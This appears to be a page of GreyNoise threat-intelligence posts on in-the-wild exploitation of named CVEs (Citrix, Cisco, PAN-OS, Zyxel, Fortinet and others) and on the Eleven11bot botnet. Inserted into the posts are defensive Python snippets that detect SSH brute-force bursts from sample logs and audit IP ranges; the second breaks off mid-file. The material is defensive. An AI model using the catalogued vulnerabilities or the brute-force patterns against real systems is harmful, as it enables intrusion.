Threat Signals

Actionable intelligence on real-world threats as they unfold. Get insights into attacker behavior, infrastructure, exploitation of zero-days and n-days, temporal patterns, and geographic hotspots — all sourced from GreyNoise’s Global Observation Grid (GOG). Stay ahead of emerging threats, block malicious IPs, and understand what’s happening in the moment.

Exploitation of CitrixBleed 2 (CVE-2025-5777) Began Before PoC Was Public

GreyNoise has observed active exploitation attempts against CVE-2025-5777 (CitrixBleed 2), a memory overread vulnerability in Citrix NetScaler. Exploitation began on June 23 — nearly two weeks before a public proof-of-concept (PoC) was released on July 4. 

We created a tag on July 7 to track this activity. Because GreyNoise retroactively associates pre-tag traffic with new tags, prior exploitation attempts are now visible in the GreyNoise Visualizer. 

Key Observations

  • First observed activity: June 23, 2025
  • PoC released: July 4, 2025
  • GreyNoise tag published: July 7, 2025
  • CISA confirms activity with GreyNoise: July 9, 2025 (prior to KEV addition) 

Targeted Behavior 

Early exploitation attempts came from malicious IPs geolocated in China. Rather than exploiting indiscriminately, these IPs targeted GreyNoise sensors configured to emulate Citrix NetScaler appliances, suggesting deliberate targeting. 

CISA Confirmation 

On July 9, shortly after we published the tag, CISA contacted GreyNoise to confirm exploitation activity. CVE-2025-5777 was subsequently added to the Known Exploited Vulnerabilities (KEV) catalog. 

Recommended Actions

Defenders can dynamically block malicious IPs to reduce exposure and suppress alerts. 

The above list will stay updated as new IPs are observed attempting to exploit CVE-2025-5777.

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

— — —

Stone is Head of Content at GreyNoise Intelligence, where he leads strategic content initiatives that illuminate the complexities of internet noise and threat intelligence. In past roles, he led partnered research initiatives with Google and the U.S. Department of Homeland Security. With a background in finance, technology, and engagement with the United Nations on global topics, Stone brings a multidimensional perspective to cybersecurity. He is also affiliated with the Council on Foreign Relations.


New DDoS Botnet Discovered: Over 30,000 Hacked Devices, Majority of Observed Activity Traced to Iran

Update (5 March 2025): Key Clarifications on Eleven11bot

Further analysis has refined the understanding of the scale and nature of Eleven11bot. Key clarifications:

Likely a Mirai Variant

  • Eleven11bot is likely not a distinct botnet, but rather a Mirai variant using a single new exploit targeting HiSilicon-based devices, particularly those running TVT-NVMS9000 software.

Overestimated Infection Numbers

  • While reports estimated 86,400 infections globally, the actual number of compromised devices is likely fewer than 5,000.

Misidentified Tracking Signature

  • The "head[...]1111" signature, initially associated with Eleven11bot, is not malware-related but rather part of the HiSilicon SDK protocol used for remote management across white-labeled devices.

Faulty Detection Method Inflated Infection Estimates

  • The reported 86K+ infections appear to be based on a misidentification of normal HiSilicon device protocol traffic as botnet activity.

How GreyNoise Identified This Activity

GreyNoise analyzed a list of 1,400 IPs provided by Censys, identifying 1,042 of them engaging in scanning and exploitation attempts. These were primarily embedded systems that typically do not initiate outbound internet communication, reinforcing their likely compromise.

While initial infection estimates were high, the activity observed in GreyNoise suggests that a subset of these devices are actively participating in Mirai-related behavior. Because these IPs are unlikely to change dynamically (e.g., through DHCP), they may continue to be involved in future Mirai botnet activity.

GreyNoise is developing an enhanced dynamic IP blocklist to help defenders take faster action on emerging threats. Click here to learn more or get on the waitlist.

--------

A newly discovered global cyber threat is rapidly expanding, infecting tens of thousands of internet-connected devices to launch powerful cyberattacks. Nokia Deepfield’s Emergency Response Team (ERT) has identified a new botnet, tracked as Eleven11bot, which they estimated has compromised over 30,000 devices, primarily security cameras and network video recorders (NVRs). 

According to Deepfield, Eleven11bot has been used in distributed denial of service (DDoS) attacks against telecom providers and gaming platforms, with some attacks lasting multiple days and causing widespread disruptions. Jérôme Meyer, a security researcher tracking the botnet, described it as “one of the largest known DDoS botnet campaigns observed since the invasion of Ukraine in February 2022.”

GreyNoise Observations on Eleven11bot

Following Deepfield’s findings, Censys provided GreyNoise with a list of 1,400 IPs that appear to be linked to Eleven11bot due to the configuration of the endpoint devices and the banners matching what Deepfield identified in their research. GreyNoise has observed 1,042 IPs actively hitting our sensors in the past 30 days. 

Key findings from our data:

  • 96% of these IPs are non-spoofable, meaning they originate from genuine, accessible devices. 
  • 61% of the 1,042 observed IPs (636) are traced to Iran. 
  • 305 IPs are currently classified as malicious by GreyNoise.

While GreyNoise does not speculate on attribution, this increase in botnet activity comes just two days after the U.S. administration reasserted its “maximum pressure” campaign on Iran, imposing new economic sanctions. 

How the Botnet is Expanding

GreyNoise observations show the botnet engaging in malicious actions presumably aimed at expanding its operations, including:

  • Brute-force attacks against login systems.
  • Exploitation of weak and default passwords on IoT devices.
  • Targeting specific security camera brands, such as VStarcam, using hardcoded credentials. 
  • Network scanning for exposed Telnet and SSH ports, which are often left unprotected on IoT hardware.

GreyNoise has identified 305 IP addresses actively carrying out malicious attacks linked to the botnet. 

How to See the Botnet in Action

SOC teams, vulnerability management professionals, and threat hunters can track the botnet’s live activity using GreyNoise:

  1. Navigate to the Analysis feature.
  2. Paste the list of botnet IPs (source: Censys) into the search bar. 
  3. Download the CSV of malicious IPs to take immediate blocking actions.

Censys-Provided IP List

A list of IPs associated with this botnet is available below: 


How Organizations Can Defend Themselves 

GreyNoise recommends the following steps to protect against the botnet and similar cyber threats: 

  • Block traffic from known malicious IPs. GreyNoise provides real-time data for defenders to block threats proactively. 
  • Monitor network logs for unusual login attempts. Attackers are brute-forcing weak Telnet and SSH credentials. 
  • Secure IoT devices immediately. Change default passwords, update firmware, and disable remote access where unnecessary. 
  • Enable DDoS protection and rate-limiting. The botnet is designed for high-intensity attacks, so organizations should harden their network defenses.
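The first two steps above (block known malicious IPs, watch logs for unusual login attempts) can be combined into a small triage script. The following is an added example, not GreyNoise's code: it assumes a malicious-IP CSV with an `ip` column (such as one exported from the GreyNoise Analysis feature; the column name is an assumption) and sshd-style syslog lines, both constructed inline, and flags sources whose failed logins burst past a threshold inside a sliding window.

```python
"""Triage helper: find SSH brute-force sources in auth logs and merge them with a
malicious-IP CSV into a block decision. Added example, not GreyNoise's code;
all sample data below is constructed for illustration."""
import csv
import io
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample export. The column name "ip" is an assumption; match it
# to the real CSV header before use.
MALICIOUS_CSV = """ip,classification
203.0.113.10,malicious
198.51.100.7,malicious
"""

# Constructed sshd lines in syslog format. 203.0.113.10 and 192.0.2.44 cycle
# through default/IoT-style usernames; 10.0.0.5 is a real user who typoed once.
AUTH_LOG = """\
Mar  3 10:00:01 nvr01 sshd[1201]: Failed password for root from 203.0.113.10 port 51234 ssh2
Mar  3 10:00:02 nvr01 sshd[1201]: Failed password for invalid user admin from 203.0.113.10 port 51235 ssh2
Mar  3 10:00:03 nvr01 sshd[1201]: Failed password for invalid user support from 203.0.113.10 port 51236 ssh2
Mar  3 10:00:04 nvr01 sshd[1201]: Failed password for invalid user user from 203.0.113.10 port 51237 ssh2
Mar  3 10:00:05 nvr01 sshd[1201]: Failed password for root from 203.0.113.10 port 51238 ssh2
Mar  3 10:00:09 nvr01 sshd[1205]: Failed password for root from 192.0.2.44 port 40001 ssh2
Mar  3 10:00:10 nvr01 sshd[1205]: Failed password for invalid user admin from 192.0.2.44 port 40002 ssh2
Mar  3 10:00:11 nvr01 sshd[1205]: Failed password for invalid user guest from 192.0.2.44 port 40003 ssh2
Mar  3 10:00:12 nvr01 sshd[1205]: Failed password for invalid user ubnt from 192.0.2.44 port 40004 ssh2
Mar  3 10:00:13 nvr01 sshd[1205]: Failed password for invalid user pi from 192.0.2.44 port 40005 ssh2
Mar  3 10:00:14 nvr01 sshd[1205]: Failed password for root from 192.0.2.44 port 40006 ssh2
Mar  3 10:05:00 nvr01 sshd[1300]: Failed password for alice from 10.0.0.5 port 50010 ssh2
Mar  3 10:05:30 nvr01 sshd[1300]: Accepted password for alice from 10.0.0.5 port 50010 ssh2
Mar  3 11:30:00 nvr01 sshd[1400]: Failed password for root from 198.51.100.7 port 33001 ssh2
"""

# sshd failure line; "invalid user" is present when the account does not exist.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def load_malicious_ips(csv_text):
    """Return the set of IPs listed in a malicious-IP CSV export."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return {row["ip"].strip() for row in rows if row.get("ip")}


def _max_in_window(times, window):
    """Largest number of events that fall inside any single sliding window."""
    times = sorted(times)
    best, lo = 0, 0
    for hi, t in enumerate(times):
        while t - times[lo] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return best


def find_bruteforce_sources(log_text, window=timedelta(seconds=60), threshold=5):
    """Map source IP -> stats for IPs with >= threshold failures in one window.

    Syslog timestamps carry no year, so all parse into the same dummy year;
    fine for relative windows, wrong across a year boundary.
    """
    failures = defaultdict(list)
    users = defaultdict(set)
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if not m:
            continue  # successful logins and unrelated lines are ignored
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")
        failures[m["ip"]].append(ts)
        users[m["ip"]].add(m["user"])
    hits = {}
    for ip, times in failures.items():
        burst = _max_in_window(times, window)
        if burst >= threshold:
            hits[ip] = {"max_in_window": burst, "total": len(times),
                        "usernames": len(users[ip])}
    return hits


def decide_blocks(log_text, csv_text, window=timedelta(seconds=60), threshold=5):
    """Return IP -> list of reasons for every IP that should be blocked."""
    listed = load_malicious_ips(csv_text)
    bursts = find_bruteforce_sources(log_text, window, threshold)
    decisions = {}
    for ip in listed | set(bursts):
        reasons = []
        if ip in listed:
            reasons.append("on malicious-IP list")
        if ip in bursts:
            b = bursts[ip]
            reasons.append(f"{b['max_in_window']} failed logins within "
                           f"{int(window.total_seconds())}s across {b['usernames']} usernames")
        decisions[ip] = reasons
    return decisions


if __name__ == "__main__":
    for ip, reasons in sorted(decide_blocks(AUTH_LOG, MALICIOUS_CSV).items()):
        print(f"block {ip}: {'; '.join(reasons)}")
```

The brute-force rule catches 192.0.2.44 even though it is not on the list, while 198.51.100.7 is blocked on the list alone after a single failure; the single typo from 10.0.0.5 is left untouched.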

GreyNoise is Actively Monitoring Eleven11bot-Linked Activity

GreyNoise continues to track real-time scanning and attack activity from the botnet. We will provide further updates if new information arises. 

Track the botnet in real time — see if your network is a target. Navigate to the GreyNoise Analysis feature, paste the IPs above into the search bar, and download the CSV of malicious IPs for immediate blocking actions. 


GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs

Key Takeaways

  • GreyNoise has detected active exploitation of 23 of the 62 CVEs mentioned in Black Basta’s leaked chat logs, including vulnerabilities affecting enterprise software, security appliances, and widely used web applications. 
  • CVE-2023-6875 is being exploited despite not being listed in CISA’s Known Exploited Vulnerabilities (KEV) catalog, reinforcing the need for real-time intelligence beyond static lists. 
  • Some of these CVEs have been actively exploited in just the past 24 hours, including critical flaws in Palo Alto PAN-OS, JetBrains TeamCity, Microsoft Exchange, and Cisco IOS XE.  
  • GreyNoise is not attributing this activity to the ransomware group, Black Basta. Rather, we are observing active exploitation of a subset of the 62 CVEs mentioned in the group’s leaked chat logs. 
  • GreyNoise confirms active exploitation of 23 of the 62 CVEs. However, since not all 62 are trackable by GreyNoise, the actual number of exploited vulnerabilities may be higher. 

GreyNoise Confirms Active Exploitation of CVEs Listed in Black Basta’s Leaked Chats

A major leak of internal chat logs from the Black Basta ransomware group has revealed 62 CVEs discussed by the group — offering a glimpse into the vulnerabilities considered for exploitation by one of the most active ransomware operators. The list, first compiled by VulnCheck, underscores how attackers continue to target publicly known vulnerabilities long after disclosure. 

To assess real-world impact, GreyNoise analyzed internet-wide exploitation activity for these vulnerabilities. Our data confirms that 23 of these CVEs are actively being exploited, including in enterprise software, security appliances, and widely used applications. 

Observed Exploitation Activity 

Below we see that 23 of the 62 CVEs mentioned in Black Basta’s leaked chat logs have been targeted within the past 30 days. 

The CVEs are: 

  • CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection 
  • CVE-2024-27198 – JetBrains TeamCity Authentication Bypass
  • CVE-2024-24919 – Check Point Quantum Security Gateways Information Disclosure
  • CVE-2024-23897 – Jenkins Command Line Interface (CLI) Path Traversal Vulnerability
  • CVE-2024-1709 – ConnectWise ScreenConnect Authentication Bypass
  • CVE-2023-6875 – wpexperts post_smtp_mailer Missing Authorization
  • CVE-2023-4966 – Citrix NetScaler ADC and NetScaler Gateway Buffer Overflow Vulnerability
  • CVE-2023-42793 – JetBrains TeamCity Authentication Bypass Vulnerability
  • CVE-2023-36845 – Juniper Junos OS PHP External Variable Control
  • CVE-2023-36844 – Juniper Junos OS EX Series PHP External Variable Modification Vulnerability
  • CVE-2023-29357 – Microsoft SharePoint Server Privilege Escalation Vulnerability
  • CVE-2023-22515 – Atlassian Confluence Broken Access Control 
  • CVE-2023-20198 – Cisco IOS XE Web UI Privilege Escalation 
  • CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution 
  • CVE-2022-41040 – Microsoft Exchange Server Server-Side Request Forgery Vulnerability
  • CVE-2022-37042 – Synacor Zimbra Collaboration Suite (ZCS) Authentication Bypass Vulnerability
  • CVE-2022-30525 – Zyxel Multiple Firewalls OS Command Injection 
  • CVE-2022-27925 – Synacor Zimbra Collaboration Suite (ZCS) Arbitrary File Upload Vulnerability
  • CVE-2022-26134 – Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability
  • CVE-2022-22965 – Spring Framework JDK 9+ Remote Code Execution Vulnerability
  • CVE-2022-1388 – F5 BIG-IP Missing Authentication Vulnerability
  • CVE-2021-44228 – Apache Log4j RCE (Log4Shell)
  • CVE-2021-26855 – Microsoft Exchange Server RCE (ProxyLogon)

Recent Exploitation: Activity Seen in the Last 24 Hours

A subset of the CVEs targeted within the past 30 days have been targeted within the past 24 hours. These include:

  • CVE-2024-3400 – Palo Alto Networks PAN-OS Command Injection 
  • CVE-2024-27198 – JetBrains TeamCity Authentication Bypass
  • CVE-2024-24919 – Check Point Quantum Security Gateways Information Disclosure
  • CVE-2024-1709 – ConnectWise ScreenConnect Authentication Bypass
  • CVE-2023-4966 – Citrix NetScaler ADC Buffer Overflow (Citrix Bleed)
  • CVE-2023-36845 – Juniper Junos OS PHP External Variable Control
  • CVE-2023-22515 – Atlassian Confluence Broken Access Control 
  • CVE-2023-20198 – Cisco IOS XE Web UI Privilege Escalation 
  • CVE-2022-41082 – Microsoft Exchange Server Remote Code Execution 
  • CVE-2022-30525 – Zyxel Multiple Firewalls OS Command Injection 
  • CVE-2021-44228 – Apache Log4j RCE (Log4Shell)
  • CVE-2021-26855 – Microsoft Exchange Server RCE (ProxyLogon)

How Defenders Can Respond 

Organizations should immediately assess their exposure to the actively exploited CVEs from this blog and take the following steps:

  • Patch these vulnerabilities — especially those being actively exploited in the last 24 hours. 
  • Use GreyNoise’s intelligence to prioritize and validate real-world threats.
  • Move beyond KEV — CVE-2023-6875 underscores the importance of real-time intelligence over advisories and lists. 

How to Investigate These CVEs in GreyNoise

  • GreyNoise customers: Log in to the GreyNoise product, navigate to the CVEs tab, paste the 62 CVEs, and select “SEARCH” to see real-time exploitation activity. 
  • Free users: GreyNoise allows you to search for exploitation activity one CVE at a time via our free lookup tool.

Full List of CVEs Mentioned in Black Basta’s Leaked Chat Logs

The following 62 CVEs were identified in Black Basta’s leaked chat logs by VulnCheck. Organizations can use this list to assess their exposure. 

  • CVE-2024-3400
  • CVE-2024-27198
  • CVE-2024-26169
  • CVE-2024-25600
  • CVE-2024-24919
  • CVE-2024-23897
  • CVE-2024-23113
  • CVE-2024-23109
  • CVE-2024-23108
  • CVE-2024-21762
  • CVE-2024-21683
  • CVE-2024-21413
  • CVE-2024-21378
  • CVE-2024-21338
  • CVE-2024-1709
  • CVE-2024-1708
  • CVE-2024-1086
  • CVE-2023-7028
  • CVE-2023-7027
  • CVE-2023-6875
  • CVE-2023-4966
  • CVE-2023-42793
  • CVE-2023-42115
  • CVE-2023-38831
  • CVE-2023-36884
  • CVE-2023-36874
  • CVE-2023-36845
  • CVE-2023-36844
  • CVE-2023-36745
  • CVE-2023-36394
  • CVE-2023-35628
  • CVE-2023-3519
  • CVE-2023-3467
  • CVE-2023-3466
  • CVE-2023-29357
  • CVE-2023-23397
  • CVE-2023-22515
  • CVE-2023-21716
  • CVE-2023-20198
  • CVE-2022-41352
  • CVE-2022-41082
  • CVE-2022-41040
  • CVE-2022-37969
  • CVE-2022-37042
  • CVE-2022-30525
  • CVE-2022-30190
  • CVE-2022-27925
  • CVE-2022-26134
  • CVE-2022-22965
  • CVE-2022-1388
  • CVE-2022-0609
  • CVE-2021-44228
  • CVE-2021-42321
  • CVE-2021-42287
  • CVE-2021-42278
  • CVE-2021-40444
  • CVE-2021-28482
  • CVE-2021-26855
  • CVE-2020-1472
  • CVE-2017-5754
  • CVE-2017-5753
  • CVE-2017-11882

GreyNoise will continue monitoring exploitation trends in real time. Stay updated by following GreyNoise’s threat intelligence reports and platform updates, and by visiting the GreyNoise Visualizer.


GreyNoise Observes Active Exploitation of Cisco Vulnerabilities Tied to Salt Typhoon Attacks

Key Takeaways

  • GreyNoise has observed active exploitation of CVE-2023-20198, with 110 malicious IPs actively targeting vulnerable Cisco devices, primarily from Bulgaria, Brazil, and Singapore. 
  • Two malicious IPs exploited CVE-2018-0171 in December 2024 and January 2025, originating from Switzerland and the United States — the same period when Salt Typhoon, a Chinese state-sponsored threat group, reportedly breached telecom networks using CVE-2023-20198 and CVE-2023-20273. 
  • CVE-2018-0171 was disclosed seven years ago, yet remains in use by advanced attackers. 
  • Unpatched Cisco systems are being actively targeted. Organizations should take immediate action. 

Background

Recent analyses have highlighted that Salt Typhoon, a Chinese state-sponsored cyber espionage group, has been actively targeting Cisco devices. The group employs various tactics, including the use of legitimate login credentials and, in some instances, exploiting known vulnerabilities such as CVE-2018-0171.

Between December 2024 and January 2025, Salt Typhoon reportedly leveraged CVE-2023-20198 and CVE-2023-20273 to compromise five additional telecom networks, including entities in the United States. 

GreyNoise Observations

GreyNoise’s Global Observation Grid (GOG) has detected malicious exploitation attempts against two Cisco vulnerabilities linked to these attacks: 

CVE-2018-0171 (IOS and IOS XE Smart Install Remote Code Execution) 

  • Observed: Two malicious IPs exploited this vulnerability in December 2024 and January 2025.
  • These IPs were traced to Switzerland and the United States.
  • Cisco Talos reported Salt Typhoon likely used this CVE in real-world attacks. 

CVE-2023-20198 (IOS XE Web UI Privilege Escalation)

  • Observed: GreyNoise has confirmed 110 malicious IPs actively exploiting CVE-2023-20198 in real time, reinforcing the scale of ongoing attacks. 
  • These IPs were primarily traced to Bulgaria, Brazil, and Singapore. 

Mitigation Recommendations

  1. Apply all patches immediately. 
  2. Restrict management interface access. 
  3. Use GreyNoise to track real-time exploitation and block malicious IPs. 

GreyNoise will continue monitoring for changes in exploitation patterns and provide updates as new intelligence emerges. Stay ahead of exploitation attempts by leveraging GreyNoise’s real-time intelligence. 

Important: These CVEs were referenced in recent Salt Typhoon reports, but we are NOT attributing this activity to Salt Typhoon — only confirming that exploitation is occurring.


GreyNoise Observes Active Exploitation of PAN-OS Authentication Bypass Vulnerability (CVE-2025-0108)

Update: February 18, 2025

  • GreyNoise now sees 25 malicious IPs actively exploiting CVE-2025-0108, up from 2 on February 13. 
  • Top 3 source countries of attack traffic: United States, Germany, Netherlands. 
  • Palo Alto Networks confirmed active exploitation and classified the CVE as ‘Highest Urgency’ for defenders. 

CISA added CVE-2025-0108 to its Known Exploited Vulnerabilities (KEV) catalog.

GreyNoise has observed active exploitation attempts targeting a newly disclosed authentication bypass vulnerability, CVE-2025-0108, affecting Palo Alto Networks PAN-OS. This high-severity flaw allows unauthenticated attackers to execute specific PHP scripts, potentially leading to unauthorized access to vulnerable systems.

Active Exploitation Detected in the Wild

GreyNoise can confirm active exploitation of CVE-2025-0108.

Organizations relying on PAN-OS firewalls should assume that unpatched devices are being targeted and take immediate steps to secure them.

Mitigation Steps: Act Now

Defenders should take the following steps immediately: 

  • Apply security patches for PAN-OS as soon as possible. 
  • Restrict access to firewall management interfaces — ensure they are not publicly exposed. 
  • Monitor active exploitation trends with GreyNoise’s CVE-2025-0108 tag.

GreyNoise will continue tracking this threat as it evolves. Stay ahead of exploitation attempts by leveraging GreyNoise’s real-time intelligence. 


New Exploitation Surge: Attackers Target ThinkPHP and ownCloud Flaws at Scale

GreyNoise has identified a significant spike in exploitation activity targeting two vulnerabilities — one already flagged by government agencies as a top target, and another flying under the radar despite real-world attacks increasing. 

  • CVE-2022-47945 (ThinkPHP LFI) – A local file inclusion vulnerability in ThinkPHP that is not in CISA’s Known Exploited Vulnerabilities (KEV) catalog and has a low EPSS score (7%), yet GreyNoise has observed a surge in exploitation attempts. 
  • CVE-2023-49103 (ownCloud GraphAPI Information Disclosure) – A vulnerability already highlighted in a joint advisory from CISA, NSA, and FBI as one of the most exploited in 2023, and exploitation continues to rise. 

Both vulnerabilities highlight a growing concern in how organizations prioritize patching:

  • Are security teams overlooking major threats because they don’t appear in KEV or have low EPSS scores?
  • How many other actively exploited vulnerabilities are slipping through the cracks?

What We’re Seeing: Surging Exploitation Activity 

GreyNoise has observed a rapid increase in exploit attempts for both vulnerabilities over the past 10 days.

Observed Exploitation Attempts for CVE-2022-47945 (ThinkPHP LFI)

Observed Exploitation Attempts for CVE-2023-49103 (ownCloud GraphAPI)

Attackers are actively scanning and targeting these vulnerabilities, yet only one is included in KEV, raising questions about how security teams are prioritizing threats. 

CVE-2022-47945 (ThinkPHP LFI) - A Growing Target

  • ThinkPHP before version 6.0.14 is vulnerable to local file inclusion (LFI) via the `lang` parameter when language packs are enabled.
  • GreyNoise has observed 572 unique IPs attempting to exploit this vulnerability, with activity increasing in recent days. 
  • ThinkPHP vulnerabilities have been targeted by Chinese attackers in past campaigns. 

CVE-2023-49103 (ownCloud GraphAPI) - Still Under Attack

  • An information disclosure vulnerability affecting ownCloud/graphapi 0.2.x before 0.2.1 and 0.3.x before 0.3.1.
  • Added to CISA KEV in November 2023, reinforcing its status as a known exploited vulnerability. 
  • GreyNoise has observed 484 unique IPs attempting exploitation, with confirmed threat actor activity.

Key Takeaways for Security Teams

  • EPSS and KEV don’t always align with real-world risk. CVE-2022-47945 has a low EPSS score (7%) yet is actively being exploited. 
  • CVE-2023-49103 remains a high-value target after being listed on KEV over a year ago. 
  • Real-time attack data is critical. Organizations overrelying on KEV and EPSS risk overlooking threats that attackers are actively scanning and exploiting. What’s being targeted and when can change in an instant, necessitating a real-time view of attacker activity. 

Mitigation Recommendations

  • Patch immediately — Upgrade ThinkPHP to 6.0.14+ and ownCloud GraphAPI to 0.3.1+.
  • Monitor and block known malicious IPs — Use real-time GreyNoise data to track and mitigate active threats. 
  • Restrict exposure — Reduce access to affected services where possible to limit attack surface. 

Block Known Malicious IPs Now: CVE-2023-49103, CVE-2022-47945

A Larger Trend: Are We Prioritizing the Wrong Vulnerabilities? 

The difference in how these two CVEs are being treated highlights a broader challenge in vulnerability management. 

  • How many actively exploited vulnerabilities are being overlooked due to low EPSS scores?
  • Are organizations placing too much trust in KEV alone, and EPSS, when prioritizing patching? 
  • What role should real-time exploitation intelligence play in risk management? 

Attackers are making their priorities clear. See live exploitation trends now for CVE-2023-49103 and CVE-2022-47945.


Active Exploitation of Zero-day Zyxel CPE Vulnerability (CVE-2024-40891)

2025-01-29 Update

After identifying a significant overlap between IPs exploiting CVE-2024-40891 and those classified as Mirai, the team investigated a recent variant of Mirai and confirmed that the ability to exploit CVE-2024-40891 has been incorporated into some Mirai strains.

GreyNoise is observing active exploitation attempts targeting a zero-day critical command injection vulnerability in Zyxel CPE Series devices tracked as CVE-2024-40891. At this time, the vulnerability is not patched, nor has it been publicly disclosed. Attackers can leverage this vulnerability to execute arbitrary commands on affected devices, leading to complete system compromise, data exfiltration, or network infiltration. At publication, Censys is reporting over 1,500 vulnerable devices online.

CVE-2024-40891 is very similar to CVE-2024-40890 (observed authentication attempts, observed command injection attempts), with the main difference being that the former is telnet-based while the latter is HTTP-based. Both vulnerabilities allow unauthenticated attackers to execute arbitrary commands using service accounts (supervisor and/or zyuser).

Background

VulnCheck disclosed CVE-2024-40891 to their partners as "Zyxel CPE Telnet Command Injection" on August 1, 2024, but as of this writing, the CVE has not yet been officially published by the vendor, nor have they published an advisory. Last week, researchers from GreyNoise collaborated with VulnCheck to verify the accuracy of the detection, ensuring that the traffic is linked to this CVE specifically. GreyNoise researchers created a tag for this issue on January 21, 2025, and worked with VulnCheck to coordinate this disclosure. Ordinarily, disclosure would be coordinated with the vendor, but due to the large number of attacks, we decided to publish this immediately.

Immediate Recommendations

  1. Network Monitoring: Filter traffic for unusual telnet requests to Zyxel CPE management interfaces.
  2. Patch Readiness: Monitor Zyxel’s security advisories for updates and apply patches or mitigations immediately, if released. Halt the use of devices that have reached end-of-life.
  3. Mitigation: Restrict administrative interface access to trusted IPs and disable unused remote management features.

GreyNoise users can track live exploitation patterns, including attacker IP addresses, for this CVE here.


Hackers Actively Exploiting Fortinet Firewalls: Real-Time Insights from GreyNoise

Over 15,000 Fortinet FortiGate firewalls have been exposed in a breach, leaving thousands with exposed login interfaces vulnerable to exploitation. GreyNoise has identified hundreds of these devices actively being weaponized by attackers for malicious purposes, providing defenders with a real-time view into their behavior and intent. 

This breach, tied to CVE-2022-40684 — an authentication bypass vulnerability disclosed in late 2022 — has created new opportunities for attackers to exploit these devices. While patches have been available since October 2022, thousands of firewalls remain exposed as of January 2025, continuing to pose a serious risk. 

But this breach isn’t just about exposure — it's about the active exploitation happening right now. In this blog, GreyNoise reveals how attackers are leveraging these devices in real time and provides critical insights to help defenders respond effectively.

GreyNoise’s Real-Time Insights: What We’re Seeing 

GreyNoise specializes in observing and classifying internet activity in real time. Our Global Observation Grid tracks attacker behaviors by monitoring interactions with thousands of our sensors worldwide. Unlike sources that focus on theoretical risks or exposure, GreyNoise reveals the actual behaviors of these compromised devices as they interact with our sensors.

Of the 15,000+ affected IPs, around 4,600 are still exposing their FortiGate web login interfaces according to Censys, down from over 5,000 at the time of the Censys blog post detailing the figures. The chart below illustrates the steady decline.  

Source: Censys

Key Observations from GreyNoise: 

1. In this Case, Interaction with GreyNoise’s Sensors = Harmful Intent

Firewalls hitting GreyNoise’s sensors are behaving abnormally. 

  • “The majority of affected IPs are classified as Unknown simply because we don’t yet have tags for their activity,” explains Bob Rudis, VP of Data Science, Security Research & Detection Engineering. “But make no mistake: by hitting our sensor network, all 366 IPs are up to no good.” 
  • All 366 IPs are engaging in behaviors indicative of threat activity. While some are confirmed as malicious, others are flagged as Suspicious or Unknown but still require attention. 

2. Behavioral Breakdown and List of Compromised IPs 

GreyNoise classifies observed activity into three categories. Here’s the breakdown for the 366 Fortinet IPs:  

  • Malicious (35 IPs): Actively scanning, probing, or delivering malicious payloads. 
  • Suspicious (45 IPs): Abnormal or pre-malicious behavior flagged under GreyNoise’s new “Suspicious” classification, designed to provide early warnings. 
  • Unknown (286 IPs): Activity that doesn’t match known tags but is inherently suspect, as Fortinet firewalls shouldn’t scan or probe networks. This suggests the devices are being leveraged for malicious purposes.

This activity is not new. GreyNoise has observed compromised Fortinet devices exhibiting harmful behaviors over several years, as shown below. The timeline highlights both the first and most recent sightings of these devices interacting with our sensor network.

To help defenders — particularly firewall administrators — take immediate action, we’re sharing a list of the 366 Fortinet IPs interacting with our sensor network, updated as of January 28: 

Download the full list of observed IPs here. This information may change; to view a dynamic list of all IPs interacting with our network, navigate to the GreyNoise Analysis Tab:

Paste the 15,000+ affected IPs:

Click “ANALYZE,” and explore the results:

3. Threat Trends: What Attackers are Doing

Tags assigned to these devices reveal active reconnaissance or exploitation activity originating from compromised Fortinet systems: 

  • SMBv1 Crawlers (82 instances): Scanning for outdated SMB protocols, often linked to WannaCry-like attacks. 
  • SSH Connection Attempts (24 instances): Brute-force or reconnaissance targeting S
  • WebCrawler (23 Instances): Reconnaissance aimed at mapping networks or identifying exposed assets. 

4. Geographic Distribution 

These compromised devices originate from multiple regions worldwide. The top 10 hotspots are: 

  1. Brazil (45%)
  2. Thailand (15%)
  3. Mexico (8%)
  4. Egypt (4%)
  5. Malaysia (3%)
  6. United Arab Emirates (2%)
  7. Colombia (2%)
  8. India (2%)
  9. Kenya (2%)
  10. Israel (1%)

This global spread underscores how widely Fortinet firewalls are deployed and how attackers are leveraging them for malicious purposes. 

Actionable Steps for Defenders

SOC Analysts & Threat Hunters

1. Audit Your IPs and CIDRs

  • Cross-check your external-facing IPs against the list of 366 observed IPs to identify any suspicious or malicious activity originating from your infrastructure. Or, obtain a real-time view of compromised IPs by navigating to the GreyNoise Analysis Tab and pasting the 15,000+ affected IPs.
  • If you are a firewall administrator using Fortinet devices, ensure your configurations are reviewed immediately to confirm no unnecessary interfaces are exposed.

2. Monitor Your Infrastructure for Compromise

  • Use GreyNoise to track malicious behaviors originating from compromised devices and ensure you receive alerts for suspicious activity tied to your infrastructure. 
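One defender-side way to carry out the audit in step 1, as an added example that is not GreyNoise's code: it parses a downloaded "ip,classification" list, matches each observed IP against the organization's external CIDRs, and tallies the hits by GreyNoise-style classification so that Unknown and Suspicious entries are not dropped on the floor. The observed IPs, their classifications and the CIDRs below are constructed sample data, not the real 366 addresses from the post.

```python
"""Audit an organization's external ranges against a list of observed IPs.

Added example (not GreyNoise's code). All input data here is constructed
sample data, not the real 366 observed Fortinet IPs from the post.
"""
import ipaddress
from collections import Counter

# Constructed sample of a downloaded list: one "ip,classification" per line,
# with blank lines, '#' comments, a malformed row and an IPv6 entry included
# so the parser's edge cases are exercised.
OBSERVED_LIST = """\
# ip,classification  (constructed sample)
203.0.113.10,malicious
203.0.113.77,suspicious
198.51.100.5,unknown
192.0.2.200,malicious
192.0.2.201,unknown
not-an-ip,malicious
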